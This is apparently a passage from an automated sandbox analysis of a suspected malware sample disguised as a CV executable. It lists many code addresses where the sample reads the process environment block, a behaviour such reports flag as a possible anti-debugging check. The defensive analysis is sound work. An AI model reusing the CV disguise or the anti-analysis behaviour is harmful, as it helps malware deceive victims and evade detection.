Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0151E53E mov eax, dword ptr fs:[00000030h]		2_2_0151E53E
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0151E53E mov eax, dword ptr fs:[00000030h]		2_2_0151E53E
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0151E53E mov eax, dword ptr fs:[00000030h]		2_2_0151E53E
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0151E53E mov eax, dword ptr fs:[00000030h]		2_2_0151E53E
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152A5D0 mov eax, dword ptr fs:[00000030h]		2_2_0152A5D0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152A5D0 mov eax, dword ptr fs:[00000030h]		2_2_0152A5D0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152E5CF mov eax, dword ptr fs:[00000030h]		2_2_0152E5CF
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152E5CF mov eax, dword ptr fs:[00000030h]		2_2_0152E5CF
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F65D0 mov eax, dword ptr fs:[00000030h]		2_2_014F65D0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F25E0 mov eax, dword ptr fs:[00000030h]		2_2_014F25E0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0151E5E7 mov eax, dword ptr fs:[00000030h]		2_2_0151E5E7
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0151E5E7 mov eax, dword ptr fs:[00000030h]		2_2_0151E5E7
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0151E5E7 mov eax, dword ptr fs:[00000030h]		2_2_0151E5E7
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0151E5E7 mov eax, dword ptr fs:[00000030h]		2_2_0151E5E7
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0151E5E7 mov eax, dword ptr fs:[00000030h]		2_2_0151E5E7
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0151E5E7 mov eax, dword ptr fs:[00000030h]		2_2_0151E5E7
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0151E5E7 mov eax, dword ptr fs:[00000030h]		2_2_0151E5E7
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0151E5E7 mov eax, dword ptr fs:[00000030h]		2_2_0151E5E7
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152C5ED mov eax, dword ptr fs:[00000030h]		2_2_0152C5ED
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152C5ED mov eax, dword ptr fs:[00000030h]		2_2_0152C5ED
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F2582 mov eax, dword ptr fs:[00000030h]		2_2_014F2582
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F2582 mov ecx, dword ptr fs:[00000030h]		2_2_014F2582
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152E59C mov eax, dword ptr fs:[00000030h]		2_2_0152E59C
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01524588 mov eax, dword ptr fs:[00000030h]		2_2_01524588
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015145B1 mov eax, dword ptr fs:[00000030h]		2_2_015145B1
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015145B1 mov eax, dword ptr fs:[00000030h]		2_2_015145B1
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015705A7 mov eax, dword ptr fs:[00000030h]		2_2_015705A7
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015705A7 mov eax, dword ptr fs:[00000030h]		2_2_015705A7
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015705A7 mov eax, dword ptr fs:[00000030h]		2_2_015705A7
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0151245A mov eax, dword ptr fs:[00000030h]		2_2_0151245A
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015AA456 mov eax, dword ptr fs:[00000030h]		2_2_015AA456
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152E443 mov eax, dword ptr fs:[00000030h]		2_2_0152E443
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152E443 mov eax, dword ptr fs:[00000030h]		2_2_0152E443
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152E443 mov eax, dword ptr fs:[00000030h]		2_2_0152E443
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152E443 mov eax, dword ptr fs:[00000030h]		2_2_0152E443
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152E443 mov eax, dword ptr fs:[00000030h]		2_2_0152E443
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152E443 mov eax, dword ptr fs:[00000030h]		2_2_0152E443
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152E443 mov eax, dword ptr fs:[00000030h]		2_2_0152E443
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152E443 mov eax, dword ptr fs:[00000030h]		2_2_0152E443
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014E645D mov eax, dword ptr fs:[00000030h]		2_2_014E645D
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0151A470 mov eax, dword ptr fs:[00000030h]		2_2_0151A470
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0151A470 mov eax, dword ptr fs:[00000030h]		2_2_0151A470
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0151A470 mov eax, dword ptr fs:[00000030h]		2_2_0151A470
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0157C460 mov ecx, dword ptr fs:[00000030h]		2_2_0157C460
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01528402 mov eax, dword ptr fs:[00000030h]		2_2_01528402
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01528402 mov eax, dword ptr fs:[00000030h]		2_2_01528402
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01528402 mov eax, dword ptr fs:[00000030h]		2_2_01528402
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152A430 mov eax, dword ptr fs:[00000030h]		2_2_0152A430
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014EC427 mov eax, dword ptr fs:[00000030h]		2_2_014EC427
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014EE420 mov eax, dword ptr fs:[00000030h]		2_2_014EE420
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014EE420 mov eax, dword ptr fs:[00000030h]		2_2_014EE420
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014EE420 mov eax, dword ptr fs:[00000030h]		2_2_014EE420
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01576420 mov eax, dword ptr fs:[00000030h]		2_2_01576420
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01576420 mov eax, dword ptr fs:[00000030h]		2_2_01576420
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01576420 mov eax, dword ptr fs:[00000030h]		2_2_01576420
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01576420 mov eax, dword ptr fs:[00000030h]		2_2_01576420
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01576420 mov eax, dword ptr fs:[00000030h]		2_2_01576420
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01576420 mov eax, dword ptr fs:[00000030h]		2_2_01576420
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01576420 mov eax, dword ptr fs:[00000030h]		2_2_01576420
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F04E5 mov ecx, dword ptr fs:[00000030h]		2_2_014F04E5
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015AA49A mov eax, dword ptr fs:[00000030h]		2_2_015AA49A
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015244B0 mov ecx, dword ptr fs:[00000030h]		2_2_015244B0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F64AB mov eax, dword ptr fs:[00000030h]		2_2_014F64AB
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0157A4B0 mov eax, dword ptr fs:[00000030h]		2_2_0157A4B0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01574755 mov eax, dword ptr fs:[00000030h]		2_2_01574755
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01532750 mov eax, dword ptr fs:[00000030h]		2_2_01532750
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01532750 mov eax, dword ptr fs:[00000030h]		2_2_01532750
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0157E75D mov eax, dword ptr fs:[00000030h]		2_2_0157E75D
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152674D mov esi, dword ptr fs:[00000030h]		2_2_0152674D
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152674D mov eax, dword ptr fs:[00000030h]		2_2_0152674D
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152674D mov eax, dword ptr fs:[00000030h]		2_2_0152674D
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F0750 mov eax, dword ptr fs:[00000030h]		2_2_014F0750
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01500770 mov eax, dword ptr fs:[00000030h]		2_2_01500770
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01500770 mov eax, dword ptr fs:[00000030h]		2_2_01500770
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01500770 mov eax, dword ptr fs:[00000030h]		2_2_01500770
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01500770 mov eax, dword ptr fs:[00000030h]		2_2_01500770
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01500770 mov eax, dword ptr fs:[00000030h]		2_2_01500770
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01500770 mov eax, dword ptr fs:[00000030h]		2_2_01500770
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01500770 mov eax, dword ptr fs:[00000030h]		2_2_01500770
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01500770 mov eax, dword ptr fs:[00000030h]		2_2_01500770
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01500770 mov eax, dword ptr fs:[00000030h]		2_2_01500770
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01500770 mov eax, dword ptr fs:[00000030h]		2_2_01500770
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01500770 mov eax, dword ptr fs:[00000030h]		2_2_01500770
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01500770 mov eax, dword ptr fs:[00000030h]		2_2_01500770
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F8770 mov eax, dword ptr fs:[00000030h]		2_2_014F8770
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01520710 mov eax, dword ptr fs:[00000030h]		2_2_01520710
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152C700 mov eax, dword ptr fs:[00000030h]		2_2_0152C700
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F0710 mov eax, dword ptr fs:[00000030h]		2_2_014F0710
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0156C730 mov eax, dword ptr fs:[00000030h]		2_2_0156C730
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152273C mov eax, dword ptr fs:[00000030h]		2_2_0152273C
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152273C mov ecx, dword ptr fs:[00000030h]		2_2_0152273C
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152273C mov eax, dword ptr fs:[00000030h]		2_2_0152273C
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152C720 mov eax, dword ptr fs:[00000030h]		2_2_0152C720
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152C720 mov eax, dword ptr fs:[00000030h]		2_2_0152C720
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014FC7C0 mov eax, dword ptr fs:[00000030h]		2_2_014FC7C0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015707C3 mov eax, dword ptr fs:[00000030h]		2_2_015707C3
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F47FB mov eax, dword ptr fs:[00000030h]		2_2_014F47FB
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F47FB mov eax, dword ptr fs:[00000030h]		2_2_014F47FB
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0157E7E1 mov eax, dword ptr fs:[00000030h]		2_2_0157E7E1
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015127ED mov eax, dword ptr fs:[00000030h]		2_2_015127ED
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015127ED mov eax, dword ptr fs:[00000030h]		2_2_015127ED
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015127ED mov eax, dword ptr fs:[00000030h]		2_2_015127ED
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0159678E mov eax, dword ptr fs:[00000030h]		2_2_0159678E
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F07AF mov eax, dword ptr fs:[00000030h]		2_2_014F07AF
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015A47A0 mov eax, dword ptr fs:[00000030h]		2_2_015A47A0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0150C640 mov eax, dword ptr fs:[00000030h]		2_2_0150C640
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01522674 mov eax, dword ptr fs:[00000030h]		2_2_01522674
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152A660 mov eax, dword ptr fs:[00000030h]		2_2_0152A660
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152A660 mov eax, dword ptr fs:[00000030h]		2_2_0152A660
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015B866E mov eax, dword ptr fs:[00000030h]		2_2_015B866E
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015B866E mov eax, dword ptr fs:[00000030h]		2_2_015B866E
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01532619 mov eax, dword ptr fs:[00000030h]		2_2_01532619
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0150260B mov eax, dword ptr fs:[00000030h]		2_2_0150260B
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0150260B mov eax, dword ptr fs:[00000030h]		2_2_0150260B
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0150260B mov eax, dword ptr fs:[00000030h]		2_2_0150260B
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0150260B mov eax, dword ptr fs:[00000030h]		2_2_0150260B
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0150260B mov eax, dword ptr fs:[00000030h]		2_2_0150260B
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0150260B mov eax, dword ptr fs:[00000030h]		2_2_0150260B
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0150260B mov eax, dword ptr fs:[00000030h]		2_2_0150260B
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0156E609 mov eax, dword ptr fs:[00000030h]		2_2_0156E609
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F262C mov eax, dword ptr fs:[00000030h]		2_2_014F262C
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01526620 mov eax, dword ptr fs:[00000030h]		2_2_01526620
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01528620 mov eax, dword ptr fs:[00000030h]		2_2_01528620
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0150E627 mov eax, dword ptr fs:[00000030h]		2_2_0150E627
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152A6C7 mov ebx, dword ptr fs:[00000030h]		2_2_0152A6C7
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152A6C7 mov eax, dword ptr fs:[00000030h]		2_2_0152A6C7
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0156E6F2 mov eax, dword ptr fs:[00000030h]		2_2_0156E6F2
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0156E6F2 mov eax, dword ptr fs:[00000030h]		2_2_0156E6F2
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0156E6F2 mov eax, dword ptr fs:[00000030h]		2_2_0156E6F2
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0156E6F2 mov eax, dword ptr fs:[00000030h]		2_2_0156E6F2
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015706F1 mov eax, dword ptr fs:[00000030h]		2_2_015706F1
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015706F1 mov eax, dword ptr fs:[00000030h]		2_2_015706F1
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F4690 mov eax, dword ptr fs:[00000030h]		2_2_014F4690
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F4690 mov eax, dword ptr fs:[00000030h]		2_2_014F4690
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015266B0 mov eax, dword ptr fs:[00000030h]		2_2_015266B0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152C6A6 mov eax, dword ptr fs:[00000030h]		2_2_0152C6A6
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01570946 mov eax, dword ptr fs:[00000030h]		2_2_01570946
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015C4940 mov eax, dword ptr fs:[00000030h]		2_2_015C4940
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01594978 mov eax, dword ptr fs:[00000030h]		2_2_01594978
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01594978 mov eax, dword ptr fs:[00000030h]		2_2_01594978
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0157C97C mov eax, dword ptr fs:[00000030h]		2_2_0157C97C
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01516962 mov eax, dword ptr fs:[00000030h]		2_2_01516962
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01516962 mov eax, dword ptr fs:[00000030h]		2_2_01516962
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01516962 mov eax, dword ptr fs:[00000030h]		2_2_01516962
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0153096E mov eax, dword ptr fs:[00000030h]		2_2_0153096E
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0153096E mov edx, dword ptr fs:[00000030h]		2_2_0153096E
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0153096E mov eax, dword ptr fs:[00000030h]		2_2_0153096E
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0157C912 mov eax, dword ptr fs:[00000030h]		2_2_0157C912
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014E8918 mov eax, dword ptr fs:[00000030h]		2_2_014E8918
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014E8918 mov eax, dword ptr fs:[00000030h]		2_2_014E8918
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0156E908 mov eax, dword ptr fs:[00000030h]		2_2_0156E908
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0156E908 mov eax, dword ptr fs:[00000030h]		2_2_0156E908
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0158892B mov eax, dword ptr fs:[00000030h]		2_2_0158892B
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0157892A mov eax, dword ptr fs:[00000030h]		2_2_0157892A
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015249D0 mov eax, dword ptr fs:[00000030h]		2_2_015249D0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015BA9D3 mov eax, dword ptr fs:[00000030h]		2_2_015BA9D3
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015869C0 mov eax, dword ptr fs:[00000030h]		2_2_015869C0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014FA9D0 mov eax, dword ptr fs:[00000030h]		2_2_014FA9D0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014FA9D0 mov eax, dword ptr fs:[00000030h]		2_2_014FA9D0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014FA9D0 mov eax, dword ptr fs:[00000030h]		2_2_014FA9D0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014FA9D0 mov eax, dword ptr fs:[00000030h]		2_2_014FA9D0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014FA9D0 mov eax, dword ptr fs:[00000030h]		2_2_014FA9D0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014FA9D0 mov eax, dword ptr fs:[00000030h]		2_2_014FA9D0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015229F9 mov eax, dword ptr fs:[00000030h]		2_2_015229F9
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015229F9 mov eax, dword ptr fs:[00000030h]		2_2_015229F9
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0157E9E0 mov eax, dword ptr fs:[00000030h]		2_2_0157E9E0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F09AD mov eax, dword ptr fs:[00000030h]		2_2_014F09AD
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F09AD mov eax, dword ptr fs:[00000030h]		2_2_014F09AD
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015789B3 mov esi, dword ptr fs:[00000030h]		2_2_015789B3
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015789B3 mov eax, dword ptr fs:[00000030h]		2_2_015789B3
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015789B3 mov eax, dword ptr fs:[00000030h]		2_2_015789B3
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015029A0 mov eax, dword ptr fs:[00000030h]		2_2_015029A0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015029A0 mov eax, dword ptr fs:[00000030h]		2_2_015029A0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015029A0 mov eax, dword ptr fs:[00000030h]		2_2_015029A0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015029A0 mov eax, dword ptr fs:[00000030h]		2_2_015029A0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015029A0 mov eax, dword ptr fs:[00000030h]		2_2_015029A0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015029A0 mov eax, dword ptr fs:[00000030h]		2_2_015029A0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015029A0 mov eax, dword ptr fs:[00000030h]		2_2_015029A0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015029A0 mov eax, dword ptr fs:[00000030h]		2_2_015029A0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015029A0 mov eax, dword ptr fs:[00000030h]		2_2_015029A0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015029A0 mov eax, dword ptr fs:[00000030h]		2_2_015029A0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015029A0 mov eax, dword ptr fs:[00000030h]		2_2_015029A0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015029A0 mov eax, dword ptr fs:[00000030h]		2_2_015029A0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015029A0 mov eax, dword ptr fs:[00000030h]		2_2_015029A0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01520854 mov eax, dword ptr fs:[00000030h]		2_2_01520854
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01502840 mov ecx, dword ptr fs:[00000030h]		2_2_01502840
